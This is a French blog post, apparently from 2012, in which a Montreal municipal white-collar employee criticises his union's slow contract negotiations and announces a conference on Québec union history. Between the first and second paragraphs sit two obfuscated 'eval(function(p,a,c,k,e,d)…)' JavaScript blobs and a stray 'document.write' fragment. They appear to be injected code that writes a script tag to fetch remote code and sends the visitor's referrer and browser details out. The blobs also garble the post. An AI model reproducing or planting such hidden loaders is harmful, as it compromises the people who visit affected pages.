Bref commentaire syndical

D’abord, document.write(“”); je rappel à tous que l’équipe du 109 au 409 (L’alternative syndicale pour les fonctionnaires municipaux de Montréal, c’est-à-dire “l’opposition officieuse” de notre très “démocratique” syndicat) tiendra demain une première conférence sur l’histoire syndicale au Québec (histoire sans doute de nous rappeler quelles devraient être les fonctions d’un véritable syndicat qui se respecte). La conférence aura lieu à partir de 19:00 au Centre St-Pierre (près du métro Beaudry, au 1212 rue Panet – salle 105). J’espère que quelqu’un m’en fera un compte rendu parce que je ne pourrai pas y être (je travaille loin et ne pourrais m’y rendre à temps).
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzaft|var|u0026u|referrer|zirnd||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eafhn|var|u0026u|referrer|dikez||js|php’.split(‘|’),0,{}))

[Mise à jour: voir le
Compte rendu de la conférence du 17 octobre 2012 sur l’histoire du syndicalisme au Québec sur le site du 109 au 409]

La suite après le saut de page:

Ça fait un bout que je m’abstiens de tout commentaire sur les affaires syndicales parce que ça me met tellement en rogne que je préfère ne pas en parler. Je lisais récemment dans le Journal Métro que les Cols Bleus avaient signé une entente de principe avec la Ville et ce trois mois avant l’échéance de leur convention collective. Je trouve ça frustrant et j’admire l’efficacité du syndicat des cols bleus (quoique l’entente n’a pas encore été entérinée par les membres et, considérant que la Ville semble pas mal fier de leur coup, je me demande si cette entente ne représentera pas un recul sur les acquis des cols bleus; enfin, on verra quand les détails seront rendu publique — peut-être sur le site de leur syndicat?).

[Mise à jour: j’ai parlé à quelques cols bleus et apparemment ils se sont fait avoir, entre autres, sur leur retraite, car ils ne peuvent plus racheter des années non-côtisées. À cause ce cela, une des personnes à qui j’ai parlé devra travailler une demi-douzaine d’années de plus ! Je suppose qu’ils vont essayer de passer quelque chose de similaire aux cols blancs…]

En comparaison, nous les Cols Blancs ont fait plutôt pitié: notre convention collective est échue depuis décembre 2010. Elle a eut une extension d’un an jusqu’en décembre 2011 et là ça fait donc presqu’un an qu’on est sans convention collective! La dernière fois que j’ai entendu que quelque chose se passait à ce sujet c’est au printemps dernier alors qu’avait lieu un colloque des représentants syndicaux pour discuter des points à négocier et qui devrait être suivi, m’avait-on assuré, par une consultation auprès des membres. Je n’ai rien entendu à ce sujet depuis (et ça fait un bon six mois)!

Je suis sûr que le syndicat se justifierait en disant qu’entre-temps ils ont dû déménager les locaux du syndicat et que l’exécutif a été pas mal occupé à jouer à la chaise musicale (une faction commettant un putsch politique pour éliminer une autre faction) mais alors je me demande: et les membres là-dedans? Loin de moi de vouloir les déranger dans leurs petits jeux mais il me semble qu’on aurait droit à une convention collective en bonne et due forme, non? Je leur paie près de quarante dollars par mois de cotisation, ils pourraient au moins faire semblant de travailler!

La goutte qui a fait déborder le vase (et ajouter l’injure à l’insulte) est ce Fonctionnaire Express datant du début du mois qui annonce une consultation en vue du renouvellement de la convention collective des cols blancs de la Cité de Dorval qui vient à échéance le 31 décembre prochain! Et nous? Et nous? Et nous? Est-ce que quelqu’un s’occupe de nous? J’en ai vraiment marre à la fin!

[Mise à jour: pour les développements sur ce sujet voir mon billet “Commentaire syndical, suite”]

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s